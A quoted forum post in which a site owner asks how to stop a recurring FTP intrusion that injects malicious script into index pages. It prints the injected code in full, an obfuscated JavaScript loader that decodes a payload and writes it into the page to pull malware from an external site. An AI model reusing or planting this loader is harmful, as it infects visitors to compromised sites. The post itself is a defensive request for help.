Originally Posted by Vippy

Hey guys

Im hoping someone can help me here with a problem i am having on a couple of my member sites being hacked.

Someone is managing to hack into my FTP server and inbedding a hidden remote file which is inserting malicious codes on my index page, that contain viruses via external url's. So anyone who reaches my index pages is hit with a trojan detection through there firewall!

The code which gets inbedded is always at the bottom of the index source code and it looks like this:

<script language="JavaScript">e = '0x00' + '5F';str1 = "&#37;E4%BC%B7%AA%C0%AD%AC%A7%B4%BB%E3%FE%AA%B7%AD %B7%BE%B7%B4%B7%AC%A7%E6%B8%B7%BC%BC%BB%B2%FE%E2%E 4%B7%BA%AE%BF%B3%BB%C0%AD%AE%BD%E3%FE%B8%AC%AC%B0% E6%F1%F1%A9%BB%AC%AE%B7%BD%B2%AC%F2%B7%B2%BA%B1%F1 %B4%BC%F1%AB%B0%B4%EF%F1%FE%C0%A9%B7%BC%AC%B8%E3%E F%C0%B8%BB%B7%B9%B8%AC%E3%EF%E2%E4%F1%B7%BA%AE%BF% B3%BB%E2%E4%F1%BC%B7%AA%E2";str=tmp='';for(i=0;i<s tr1.length;i+=3){tmp =unescape(str1.slice(i,i+3));str=str+String.fromCh arCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

When i upload my local clean copy of the index page it was over writing the infected file and he would pop up again with this code every 1 - 2 weeks.

The only further solution i have managed to find so far is to restrict FTP access from anywhere other than my local IP. Then we managed to detect this guy is in Russia and was accessing the remote file without using FTP and we banned all IP's from Russia! However i fear this is only a temporary solution as he can figure this out and spoof his IP address.

Anyone have any ideas what else i can do to keep this ass hole away??